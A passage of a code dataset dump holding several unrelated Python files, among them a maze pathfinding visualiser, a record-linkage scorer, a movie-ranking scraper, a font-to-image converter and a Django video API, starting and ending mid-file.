self._matrix[i][j] == 1:\n self._ecran.blit(self._enqueued, (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 1:\n self._ecran.blit(self._water[self._matrix[i][j] % 10 - 1], (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 2:\n self._ecran.blit(self._magma[self._matrix[i][j] % 10 - 1], (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 3:\n self._ecran.blit(self._start, (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 4:\n self._ecran.blit(self._end, (i * imgSize, j * imgSize))\n if self._s != 0 and distMatrix[i][j] >= 0:\n self._ecran.blit(self._font.render(str(distMatrix[i][j]), True, self.getColor(distMatrix[i][j])), (i * imgSize, j * imgSize))\n def draw(self, x, y):\n # a long long condition to not kill the boat or the treasure\n if self._testXY(x, y) and (self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y)) and (self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y)):\n self._matrix[x][y] = 20 + r(1, 4)\n def erase(self, x, y):\n # a long long condition to not draw over the boat or treasure and delete the walls\n if self._testXY(x, y) and (self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y)) and (self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y)):\n self._matrix[x][y] = 10 + r(1, 4)\n def canStart(self):\n # this let the algotithm start iff you set the startingPoint and endingPoint\n if self._startPoint != 0 and self._endPoint != 0:\n return True\n else:\n return False\n def setStart(self, x, y):\n if self._startPoint != 0 and self._endPoint != 0 and (self._endPoint[0] == x and self._endPoint[1] == y):\n # this conditional statement is just for swap the boat with treasure\n self._startPoint, self._endPoint = self._endPoint, self._startPoint\n self._matrix[self._startPoint[0]][self._startPoint[1]] = 30\n self._matrix[self._endPoint[0]][self._endPoint[1]] = 40\n else:\n if self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y):\n # if you try to put the boat on the same position nothing will changes, only if is somewhere else\n self._matrix[self._startPoint[0]][self._startPoint[1]] = r(1, 2) * 10 + r(1, 4) # int the last position of the boat will appear magma or water\n self._startPoint = 0\n if self._matrix[x][y] // 10 == 1:\n # this won't let you to put the boat on magma\n self._matrix[x][y] = 30\n self._startPoint = (x, y)\n print(self._startPoint, self._endPoint)\n def setEnd(self, x, y):\n if self._endPoint != 0 and self._startPoint != 0 and (self._startPoint[0] == x and self._startPoint[1] == y):\n # this if is just for swap the treasure with the boat, it isn't necessary but it looks cool\n self._startPoint, self._endPoint = self._endPoint, self._startPoint\n self._matrix[self._startPoint[0]][self._startPoint[1]] = 30\n self._matrix[self._endPoint[0]][self._endPoint[1]] = 40\n else:\n # this is the most important part in setting the ending point\n if self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y):\n # if you trie to put the treasure on same place, it will let it unchanged\n self._matrix[self._endPoint[0]][self._endPoint[1]] = r(1, 2) * 10 + r(1, 4) # when you change the position of the treasure, in the last place will be magma or water\n self._endPoint = 0\n if self._matrix[x][y] // 10 == 1:\n # with this condition you can put the treasure only on water\n self._matrix[x][y] = 40\n self._endPoint = (x, y)\n print(self._startPoint, self._endPoint)\n def _testXY(self, x, y):\n # test if x and y are inside the map\n return x != 0 and x != self._nRows - 1 and y != 0 and y != self._nColumns - 1\n def startSolve(self):\n # create instance of class Solve, this is more for visualisation\n # if i made an method that solves Lee/DFS, then i saw only the beginning and the result of algorithm\n # using a functor, i can redraw the map after every step\n self._s = solver.Solve(self._nRows, self._nColumns, self._matrix, [11, 12, 13, 14], self._startPoint, self._endPoint)\n def continueSolve(self):\n if self._s.canWork():\n self._matrix = self._s.getMatrix()\n self.showMatrix()\n return True\n return False\n def makeItLikeBeforeLee(self):\n # different from initializeMatrix because it keeps painted walls an erase path, distance and enqueued tiles\n self._startPoint = self._endPoint = 0\n for i in range(self._nRows):\n for j in range(self._nColumns):\n if self._matrix[i][j] < 10:\n self._matrix[i][j] = 10 + r(1, 4)\n self.borderMatrix()\n def minPath(self):\n # v is queue used in solving returned as a vector, with the structure of a tuple with (actualPosition, parentPosition, discoveryTime)\n # parentPosition is used to find the path faster than in O(n^2)\n # discoveryTime is just for coloring\n distMatrix = [0] * self._nRows\n for i in range(self._nRows):\n distMatrix[i] = [-1] * self._nColumns\n if self._s.isThereAPath:\n self.makeItLikeBeforeLee()\n v = self._s.getVector()\n i = -1\n while v[i][1] != -1:\n self._matrix[v[i][0][0]][v[i][0][1]] = 0\n distMatrix[v[i][0][0]][v[i][0][1]] = v[i][2]\n i = v[i][1]\n self._matrix[v[-1][0][0]][v[-1][0][1]] = 40\n self._matrix[v[0][0][0]][v[0][0][1]] = 30\n self._s.setDistMatrix(distMatrix)\n else:\n print(\"There is no path from ship to the treasure\")\n def saveMatrix(self):\n # just saving the matrix in secondary memory, also nothing fancy\n with open(\"map.txt\", \"w\") as g:\n for i in range(self._nRows):\n for j in range(self._nColumns):\n if self._matrix[i][j] < 10:\n g.write(f\"{10 + r(1, 4)} \")\n else:\n g.write(f\"{self._matrix[i][j]} \")\n g.write(\"\\n\")\n print(\"Matricea a fost salvata\")\n def getMatrixFromFile(self):\n # just reading the matrix from map.txt then show it, nothing fancy\n self.initializeMatrix()\n self._startPoint = self._endPoint = 0\n try:\n f = open(\"map.txt\", \"r\")\n for i in range(self._nRows):\n self._matrix[i] = list(map(int, f.readline().split()))\n for j in range(len(self._matrix[i])):\n if self._matrix[i][j] == 30: # the ship\n self._startPoint = (i, j)\n elif self._matrix[i][j] == 40: # the treasure\n self._endPoint = (i, j)\n print(self._startPoint, self._endPoint)\n self.showMatrix()\n f.close()\n except:\n print(\"File not found!\")\n def getColor(self, n): # Calculate the color for visual distance\n r = 255\n g = 255 - 2 * n\n b = 0\n if g < 0:\n g = 0\n b = (-g) % 256\n return (r, g, b)","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"226372689","text":"import json\nimport emailGenMethods\nfrom CacheMethods.combineAllCaches import combineAllCaches\nfrom CacheMethods.makeIMDBCache import makeIMDBCache\n\n# with open('./Caches/PopularMovies.json', 'r') as f:\n# origDict = json.load(f)\n# print(len(origDict))\n# print(xxx)\n\nwith open('../newBmetric/movies.json', 'r') as f:\n movies = json.load(f)\n\nwith open('../IMDBCache.json', 'r') as cache:\n linkDict = json.load(cache)\n\nfullPseudoFilmography = [(movies[a]['title'], 'https://www.imdb.com/title/tt' + '0'*(7 - len(a)) + a + '/') for a in movies][100:200]\npseudoFilmography = [a for a in fullPseudoFilmography if a[1] not in linkDict or 'rottentomatoes' not in ''.join(linkDict[a[1]])]\nprint(len(pseudoFilmography))\n\nemailDict = emailGenMethods.getEmailDict(pseudoFilmography)\n\ntry:\n with open('../Caches/PopularMovies.json', 'r') as f:\n origDict = json.load(f)\nexcept:\n origDict = dict()\norigDict.update(emailDict)\nemailDict = origDict.copy()\n\nwith open('../Caches/PopularMovies.json', 'w') as f:\n json.dump(emailDict, f)\n\ncombineAllCaches('../Caches/', '../FilmCache.json')\nmakeIMDBCache('../FilmCache.json')\n\nwith open('../RTPopularLog.html','w') as logFile:\n logFile.write('\\n')\n emailGenMethods.splitFilms(logFile, 'NONE', pseudoFilmography)\n logFile.write('')","sub_path":"CacheMethods/addPopularToCache.py","file_name":"addPopularToCache.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100510463","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n## IMPORTANT: FOLDER STRUCTURE ##\r\nBelow mentioned folder structure must be followed for getting the results from this script:\r\n01. Script must be placed into a folder known as main folder\r\n02. Source files (3 lists) must be placed into the Source folder under main folder\r\n03. a folder named as IntermediateFiles must be created under main folder with below mentioned sub-folders\r\n A. Source\r\n B. Preprocessed\r\n C. IntermediateFiles\r\n i. DDM\r\n ii. PDM\r\n\r\n## IMPORTANT: EXECUTION ORDER ##\r\nBelow scripts must be exected in the mentioned order:\r\n01. 01_RecordLinkageDDM.py\r\n02. 02_RecordLinkagePDM.py\r\n03. 03_RecordLinkageDDMScore.py\r\n04. 04_RecordLinkagePDMScore.py\r\n\r\nThis script generates record based score in case of a match between customer list and negative/positive lists. It performs below mentioned steps:\r\n01. Reads data from the files generated after DDM completion\r\n02. generates record based score corresponding to all the DDM records\r\n03. Generates files under DDM folder present under IntermediateFiles folder\r\n\r\n\"\"\"\r\n\r\n# Load required packages\r\nimport os\r\nimport pandas as pd\r\nimport recordlinkage\r\nfrom datetime import datetime\r\nimport numpy as np\r\nfrom difflib import SequenceMatcher\r\nimport math\r\n\r\n\r\ndef extractSource(dir, files):\r\n '''\r\n Function to extract Data from files in a specific format\r\n '''\r\n t = {\"FIRST_NAME\": object, \"LAST_NAME\": object, \"DOB\": object, \"STREET\": object,\"ZIP\": object, \"CITY\": object, \"HNRNEW\": object}\r\n files = datetime.now().strftime(\"%Y%m%d\") + \"_\" + files\r\n filename = dir + files\r\n df = pd.read_csv(filename, index_col=\"ID\", na_values=\"0000-00-00\", dtype=t)\r\n return df\r\n\r\ndef similar(a, b):\r\n '''\r\n Function to generate similarity score between two strings (a, b)\r\n '''\r\n return SequenceMatcher(None, a, b).ratio()\r\n\r\ndef scorePOS(rec, df_cust, df_pos):\r\n '''\r\n Function to assign weights to each column, generate similarity score corresponding to each value in the matched rows and come up with overall match score for the matched records between customer and positive lists\r\n '''\r\n W = {\"FIRST_NAME\": 19, \"LAST_NAME\": 25, \"DOB\": 28, \"STREET\": 11,\"ZIP\": 6, \"CITY\": 8, \"HNRNEW\": 3}\r\n cust_rec = df_cust.loc[rec['ID_CUST']]\r\n pos_rec = df_pos.loc[rec['ID_POS']]\r\n df = pd.DataFrame()\r\n null_col = (cust_rec[cust_rec.isna()].index | pos_rec[pos_rec.isna()].index).tolist()\r\n R = 0.0\r\n for k in W.keys():\r\n if k in null_col:\r\n R += W[k]\r\n W[k] = 0\r\n D = {}\r\n for k in W.keys():\r\n W[k] = W[k] * 100 / (100 - R)\r\n if k in null_col:\r\n D[k] = 0.0\r\n else:\r\n if (k == 'DOB'):\r\n if (similar(cust_rec[k], pos_rec[k]) < 1):\r\n D[k] = 0\r\n else:\r\n D[k] = 1\r\n else:\r\n D[k] = similar(cust_rec[k], pos_rec[k])\r\n W = pd.Series(W, name = 'W') \r\n D = pd.Series(D, name = 'D')\r\n df = pd.concat([D, W], axis=1)\r\n df['S'] = df['D'] * df['W']\r\n return df['S'].sum()\r\n\r\ndef scoreNEG(rec, df_cust, df_neg):\r\n '''\r\n Function to assign weights to each column, generate similarity score corresponding to each value between matched rows and come up with overall match score for the matched records between customer and negative lists\r\n '''\r\n W = {\"FIRST_NAME\": 19, \"LAST_NAME\": 25, \"DOB\": 28, \"STREET\": 11,\"ZIP\": 6, \"CITY\": 8, \"HNRNEW\": 3}\r\n cust_rec = df_cust.loc[rec['ID_CUST']]\r\n neg_rec = df_neg.loc[rec['ID_NEG']]\r\n df = pd.DataFrame()\r\n null_col = (cust_rec[cust_rec.isna()].index | neg_rec[neg_rec.isna()].index).tolist()\r\n R = 0.0\r\n for k in W.keys():\r\n if k in null_col:\r\n R += W[k]\r\n W[k] = 0\r\n D = {}\r\n for k in W.keys():\r\n W[k] = W[k] * 100 / (100 - R)\r\n if k in null_col:\r\n D[k] = 0.0\r\n else:\r\n if (k == 'DOB'):\r\n if (similar(cust_rec[k], neg_rec[k]) < 1):\r\n D[k] = 0\r\n else:\r\n D[k] = 1\r\n else:\r\n D[k] = similar(cust_rec[k], neg_rec[k])\r\n W = pd.Series(W, name = 'W') \r\n D = pd.Series(D, name = 'D')\r\n df = pd.concat([D, W], axis=1)\r\n df['S'] = df['D'] * df['W']\r\n return df['S'].sum()\r\n\r\ndef MatchScore(ddm, cust, pos, neg):\r\n '''\r\n Function to identify the matched rows and call the appropriate function to get row based score\r\n '''\r\n d = {}\r\n for i in range(len(ddm)):\r\n rec = ddm.iloc[i]\r\n if pd.isnull(rec['ID_NEG']):\r\n d[i] = scorePOS(rec, cust, pos)\r\n elif pd.isnull(rec['ID_POS']):\r\n d[i] = scoreNEG(rec, cust, neg)\r\n else:\r\n d[i] = 0\r\n ddm['NEW_SCORE'] = ddm.index.to_series().map(d)\r\n return ddm\r\n\r\ndef MatchedFiles(dir, file, df):\r\n '''\r\n Function to create intermediate files post a specific operation like Data Preprocessing without index values\r\n '''\r\n originalFiles = [\"00_List_Customer_Monitoring.csv\", \"01a_List_Negative.csv\", \"01b_List_Positive.csv\"]\r\n if file in originalFiles:\r\n file = file\r\n else:\r\n file = datetime.now().strftime(\"%Y%m%d\") + \"_\" + file\r\n filename = dir + file\r\n df.to_csv(filename, index=False)\r\n\r\n# Main function - starting point of the script\r\nif __name__ == \"__main__\":\r\n print(\"Data Load started: \" + str(datetime.now()))\r\n cwd = os.getcwd()\r\n intFileDir = cwd + r\"\\\\IntermediateFiles\\\\Preprocessed\\\\\"\r\n print(\"CUSTOMER MONITORING LIST\")\r\n custFile = r\"PP_00_List_Customer_Monitoring.csv\"\r\n df_cust = extractSource(intFileDir, custFile)\r\n print(\"NEGATIVE LIST\")\r\n negFile = r\"PP_01a_List_Negative.csv\"\r\n df_neg = extractSource(intFileDir, negFile)\r\n print(\"POSITIVE LIST\")\r\n posFile = r\"PP_01b_List_Positive.csv\"\r\n df_pos = extractSource(intFileDir, posFile)\r\n print(\"Data Load Completed!!! \" + str(datetime.now()))\r\n intFileDir = cwd + r\"\\\\IntermediateFiles\\\\DDM\\\\\"\r\n ddmFile = intFileDir + datetime.now().strftime(\"%Y%m%d\") + '_' + r'DDM.csv'\r\n df_ddm = pd.read_csv(ddmFile)\r\n df_ddm1 = df_ddm.copy()\r\n df_ddm1 = MatchScore(df_ddm1, df_cust, df_pos, df_neg)\r\n ddmFile1 = r'DDM1.csv'\r\n MatchedFiles(intFileDir, ddmFile1, df_ddm1)","sub_path":"03_RecordLinkageDDMScore.py","file_name":"03_RecordLinkageDDMScore.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"71690099","text":"from datetime import datetime, timedelta, date\nfrom collections import Counter\nfrom wordcloud import WordCloud\nimport fasttext\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom config import MiningConfig\n\n\ndef extract_case_study_texts(start, end, img_name):\n print('loading models ...')\n model_rel = fasttext.load_model(MiningConfig.slo_case_study_relevance_model_path)\n model_cate_social = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'social')\n model_cate_economic = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'economic')\n model_cate_environmental = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'environmental')\n model_cate_other = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'other')\n model_stance = fasttext.load_model(MiningConfig.slo_case_study_stance_model_path)\n print('done.')\n\n f = open(MiningConfig.slo_text_series_path)\n lines = f.readlines()\n\n all_text = []\n all_category = []\n all_stance = []\n\n for line in lines:\n timestamp, company, text = line.strip().split('\\t')\n\n rel = model_rel.predict(text)[0][0]\n social = model_cate_social.predict(text)[0][0]\n economic = model_cate_economic.predict(text)[0][0]\n environmental = model_cate_environmental.predict(text)[0][0]\n other = model_cate_other.predict(text)[0][0]\n stance = model_stance.predict(text)[0][0]\n\n # if rel == '__label__irrelevance':\n # continue\n\n try:\n _date = (datetime(1970, 1, 1) + timedelta(milliseconds=int(timestamp))).date()\n except ValueError:\n _date = datetime.strptime(timestamp.split('T')[0], '%Y-%m-%d').date()\n\n text = text.replace('bhp', '')\n text = text.replace('billiton', '')\n text = text.replace('URL', '')\n text = text.replace('via', '')\n\n if start <= _date <= end:\n all_text.append(text)\n\n if social != '__label__none':\n all_category.append(social)\n if economic != '__label__none':\n all_category.append(economic)\n if environmental != '__label__none':\n all_category.append(environmental)\n if other != '__label__none':\n all_category.append(other)\n all_stance.append(stance)\n\n print(Counter(all_category))\n print(Counter(all_stance))\n print(len(all_text))\n\n wordcloud = WordCloud().generate(' '.join(all_text))\n\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.tight_layout()\n plt.axis(\"off\")\n plt.savefig(img_name, dpi=600)\n plt.show()\n\n\ndef draw_full_time_series():\n df = pd.read_csv(MiningConfig.slo_time_series_company_csv_path, index_col=0)\n print(df)\n for col in df.columns:\n df[col] = df[col].ewm(alpha=0.025).mean()\n ax = df.plot(legend=True, grid=False, figsize=(8, 5), fontsize=16)\n for i, line in enumerate(ax.lines):\n if i == len(ax.lines) - 1:\n line.set_linewidth(4)\n line.set_color('black')\n line.set_linestyle('-')\n else:\n line.set_linewidth(2)\n line.set_linestyle('-')\n\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(handles=handles, labels=labels, fontsize=12, loc='upper left', bbox_to_anchor=(1.01, 1))\n labels = [item.get_text() for item in ax.get_xticklabels()]\n labels[1] = '2016'\n labels[2] = '2017'\n labels[3] = '2018'\n labels[4] = '2019'\n labels[5] = '2020'\n ax.set_xlabel('')\n ax.set_ylabel('EWMA', fontsize=20)\n ax.set_xticklabels(labels, rotation=45, fontsize=16)\n _, _, ymin, ymax = ax.axis()\n # print([a for a in ax.get_xticks()])\n ax.vlines(105, ymin=ymin, ymax=ymax, linestyles='--', color='grey', linewidth=2)\n ax.grid(b=True, which='major', axis='y', color='grey', linestyle='--', alpha=1)\n plt.tight_layout()\n plt.show()\n\n\ndef draw_bhp_time_series():\n df = pd.read_csv(MiningConfig.slo_time_series_bhp_csv_path)\n\n for col in df.columns:\n if col != 'company' and col != 'date':\n df[col] = df[col].ewm(alpha=0.05).mean()\n\n df = df.drop(columns=['company'])\n df = df.rename(columns={'mean': 'SLO score',\n 'overallMean': 'Mean',\n 'lower': 'LCL', 'upper': 'UCL'})\n\n df['date'] = pd.to_datetime(df['date'], errors='coerce')\n\n plt.figure(figsize=(6, 6))\n plt.plot_date(df['date'], df['LCL'], '--', color='grey', alpha=0.2)\n plt.plot_date(df['date'], df['UCL'], '--', color='grey', alpha=0.2)\n plt.plot_date(df['date'], df['SLO score'], '-', color='orange', linewidth=2, label='BHP')\n plt.plot_date(df['date'], df['Mean'], '-', color='black', linewidth=4, label='Mean')\n plt.fill_between(df['date'], df['LCL'], df['UCL'],\n where=df['UCL'] >= df['LCL'],\n facecolor='grey', alpha=0.2, interpolate=True)\n plt.xlim((pd.to_datetime('2016-01-01', format='%Y-%m-%d', errors='ignore'),\n pd.to_datetime('2016-06-30', format='%Y-%m-%d', errors='ignore')))\n _, _, ymin, ymax = plt.axis()\n plt.vlines([pd.to_datetime('2016-03-01', format='%Y-%m-%d', errors='ignore')],\n ymin=ymin, ymax=ymax, linestyles='--', color='grey', linewidth=2)\n plt.xticks(rotation=45, fontsize=16)\n plt.yticks(fontsize=16)\n plt.ylabel('EWMA', fontsize=20)\n plt.legend(loc='lower right', fontsize=16)\n plt.tight_layout()\n plt.grid(b=True, which='major', axis='y', color='grey', linestyle='--', alpha=1)\n plt.show()\n\n\nif __name__ == '__main__':\n extract_case_study_texts(date(2016, 1, 1), date(2016, 3, 1),\n MiningConfig.slo_case_study_bhp_mariana_wc_path) # mariana\n extract_case_study_texts(date(2019, 1, 25), date(2019, 2, 25),\n MiningConfig.slo_case_study_bhp_brumadinho_wc_path) # brumadinho\n draw_full_time_series()\n draw_bhp_time_series()\n","sub_path":"experiments/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"402374451","text":"class Solution:\r\n def findLengthOfLCIS(self, nums: List[int]) -> int:\r\n temp_count = 1\r\n max_count = 1\r\n \r\n for i in range(len(nums)-1):\r\n if nums[i] < nums[i+1]:\r\n temp_count += 1\r\n max_count = max(max_count, temp_count)\r\n else:\r\n temp_count = 1\r\n \r\n return max_count\r\n\r\n \r\n\r\n# SIMILAR question: find the length of the longest substring with the repeating letter \r\n\r\n# class Solution:\r\n# def findLengthOfLongestSubstring(self, s): \r\n# cur_count = 1\r\n# max_count = 0\r\n\r\n# for i in range(len(s)-1):\r\n# if s[i] == s[i+1]:\r\n# cur_count += 1\r\n# max_count = max(max_count, cur_count)\r\n# else:\r\n# cur_count = 1\r\n\r\n# return max_count\r\n\r\n \r\n# # s = 'ABBBBBABA'\r\n# # s = '101101111'\r\n \r\n# Time: O(N), where N is the length of nums. We perform one loop through nums.\r\n# Space: O(1), the space used by result and count.\r\n","sub_path":"14 Sliding Window/674. Longest Continuous Increasing Subsequence.py","file_name":"674. Longest Continuous Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"396912995","text":"import requests\nimport re\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/67.0.3396.99 Safari/537.36'}\n\n\ndef get_one_page(url):\n try:\n r = requests.get(url, headers=headers)\n r.raise_for_status()\n return r.text\n except Exception as e:\n print(e)\n return ''\n\n\ndef parse_one_page(html):\n pattern = '.*?index.*?>(.*?)
.*?name.*?a.*?>(.*?).*?star\">(.*?)
.*?releasetime\">(.*?)' \\\n '.*?integer\">(.*?).*?fraction\">(.*?).*?'\n items = re.findall(pattern, html, re.S)\n for item in items:\n index = item[0]\n name = item[1]\n star = item[2].strip()[3:]\n time = item[3].strip()[5:]\n score = item[4] + item[5]\n print(index, name, star, time, score)\n\n\ndef main():\n for i in range(5):\n url = \"http://maoyan.com/board/4?offset=\" + str(i * 10)\n html = get_one_page(url)\n parse_one_page(html)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"猫眼电影/use_re.py","file_name":"use_re.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225772850","text":"# Image and label files are created in the called directory.\n#\n# ./\n# └ ${font_name}/\n# ├ image/\n# │ ├ ${font_name}_${char}_${asciicode}.png\n# │ ├ ${font_name}_${char}_${asciicode}.png\n# │ └ ${font_name}_${char}_${asciicode}.png\n# ├ ${font_name}-d.txt # data written by 0-256\n# └ ${font_name}-t.txt # label\n#\n# USAGE: ipython font_to_png_and_txt.py FONT_FILE_PATH [WIDTH] [HEIGHT]\n\nimport subprocess as sp\nimport sys\nfrom skimage import io\n\nargs = sys.argv\n\nPATH = args[1]\n\n# decide the image size\nif len(args) == 4:\n WIDTH = args[2]\n HEIGHT = args[3]\nelif len(args) == 3:\n WIDTH = HEIGHT = args[2]\nelse:\n WIDTH = HEIGHT = '64'\n\n\nfont_name = PATH.split(\"/\")[-1].split(\".\")[0]\n\n# characters\n# atoz = [chr(i) for i in range(97,97+26)]\n# AtoZ = [chr(i) for i in range(65,65+26)]\n# num = [chr(i) for i in range(ord('0'),ord('9')+1)]\nAscii = [chr(i) for i in range(32, 127)] \n\n# list = atoz + AtoZ + num\nlist = Ascii\n\n# create save directory\nsp.run([\"mkdir\", \"-p\", font_name+\"/image\"])\n\n# data\nf = open(font_name + '/' + font_name + '-d.txt', 'w')\n# label\ng = open(font_name + '/' + font_name + '-t.txt', 'w')\n\n# create image file\nfor num, c in enumerate(list):\n if c is '/':\n file_name = font_name+str(ord(c))+\"_slash_.png\"\n elif c is '\\\\':\n file_name = font_name+str(ord(c))+\"_back_slash_.png\"\n else:\n file_name = font_name+str(ord(c))+\"_'\"+c+\"'_\"+\".png\"\n\n\n if c is not '\\\\':\n sp.run([\"convert\", \"-font\", PATH, \"-size\", WIDTH+\"x\"+HEIGHT, \"-gravity\", \"Center\", \"label:\"+c, font_name+\"/image/\"+file_name ])\n else:\n sp.run([\"convert\", \"-font\", PATH, \"-size\", WIDTH+\"x\"+HEIGHT, \"-gravity\", \"Center\", \"label:\"+c+c, font_name+\"/image/\"+file_name ])\n\n\n img = io.imread(font_name + \"/image/\" + file_name)\n f.write( ','.join( map(str, img.reshape(-1)) ) )\n f.write('\\n')\n g.write(c+'\\n')\n\n sys.stdout.write(\"\\r{}: [*{}{}]\".format(font_name, \"*\"*num, \"-\"*(len(list)-(num+1))))\n sys.stdout.flush()\n\nf.close()\ng.close()\n\nprint()\n","sub_path":"bin/ascii_font_to_png_and_txt.py","file_name":"ascii_font_to_png_and_txt.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59172660","text":"def pattern_twelve(strings):\r\n '''Pattern twelve\r\n\r\n U\r\n D U\r\n N D U\r\n A N D U\r\n M A N D U\r\n H M A N D U\r\n T H M A N D U\r\n A T H M A N D U\r\n K A T H M A N D U\r\n '''\r\n\r\n if not str(strings).isalpha():\r\n strings = str(strings) # If provided is integer then converting to string\r\n\r\n for x in range(1, len(strings) + 1):\r\n print(' '.join(strings[-x:]))\r\n\r\n '''Another Way to do the same thing\r\n string = 'KATHMANDU'\r\n\r\n for i in range(len(string) - 1, -1, -1):\r\n print(' '.join(string[i:])) '''\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n pattern_twelve('KATHMANDU')\r\n\r\n except NameError:\r\n print('String or Integer was expected')\r\n","sub_path":"Project Pattern/pattern_12.py","file_name":"pattern_12.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65088408","text":"# -*- coding: utf-8 -*-\r\n\r\n# 视频管理\r\n\r\nfrom django.db.models import Q\r\nfrom django.http import HttpResponse\r\n\r\nfrom tutils import t_url_tools\r\nfrom video_manager.models import Tag, Video\r\n\r\n\r\n# 获取标签\r\ndef get_tags(json_obj):\r\n tag = int(json_obj['tag'])\r\n if tag < 0:\r\n all_tags = Tag.objects.all()\r\n else:\r\n all_tags = Tag.objects.filter(parent_tag_id=tag)\r\n response_data = []\r\n for item in all_tags:\r\n res_item = {}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['title'] = item.title\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data) # 获取标签\r\n return s\r\n\r\n\r\n# 通过标签获取视频\r\ndef get_video_by_tag(json_obj):\r\n s = \"[]\"\r\n tag = int(json_obj['tag'])\r\n page = int(json_obj['page'])\r\n rows = int(json_obj['rows'])\r\n\r\n # 在没有manyToMany的表里面\r\n search_tag = Tag.objects.filter(id=tag).first()\r\n if None == search_tag:\r\n return HttpResponse(s)\r\n\r\n all_videos = search_tag.video_set.all()[page:rows + page]\r\n response_data = []\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n return t_url_tools.get_response_str(response_data) # 通过关键字搜索视频\r\n\r\n\r\ndef get_video_by_gjz(json_obj):\r\n gjz = json_obj['gjz']\r\n all_videos = Video.objects.filter(Q(title__contains=gjz) | Q(desc__contains=gjz))\r\n response_data = []\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data)\r\n return s\r\n\r\n\r\n# 排序视频\r\ndef get_videos_order(json_obj):\r\n video_type = int(json_obj['type'])\r\n page = int(json_obj['page'])\r\n rows = int(json_obj['rows'])\r\n all_videos = []\r\n top_video = []\r\n if 1 == video_type: # 最新\r\n all_videos = Video.objects.order_by(\"-upload_time\")[page:rows + page]\r\n elif 2 == video_type: # 最热\r\n all_videos = Video.objects.order_by(\"-play_count\")[page:rows + page]\r\n elif 3 == video_type: # 推荐\r\n all_videos = Video.objects.order_by(\"-recommend\")[page:rows + page]\r\n elif 4 == video_type: # 一个推荐,剩下的按时间\r\n top_video = Video.objects.order_by(\"-recommend\")[:1]\r\n all_videos = Video.objects.filter(~Q(id=top_video.first().id)).order_by(\"-upload_time\")[page:rows + page]\r\n else:\r\n s = t_url_tools.get_response_str({}, success=False, msg=\"查找类型有误\",\r\n err_code=t_url_tools.ERR_CODE_PARM)\r\n return s\r\n\r\n response_data = []\r\n for item in top_video:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data)\r\n return s\r\n\r\n\r\ndef get_video_by_id(json_obj):\r\n vid = json_obj['vid']\r\n all_videos = Video.objects.filter(id=vid)\r\n if all_videos.__len__() <= 0:\r\n s = t_url_tools.get_response_str({}, success=False, msg=\"视频不存在\", err_code=t_url_tools.ERR_CODE_DATA)\r\n return\r\n\r\n # 记录播放量\r\n video_model = all_videos.first()\r\n res_item = {'title': video_model.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(video_model.pic_url)[1]\r\n res_item['video_url'] = video_model.video_url\r\n 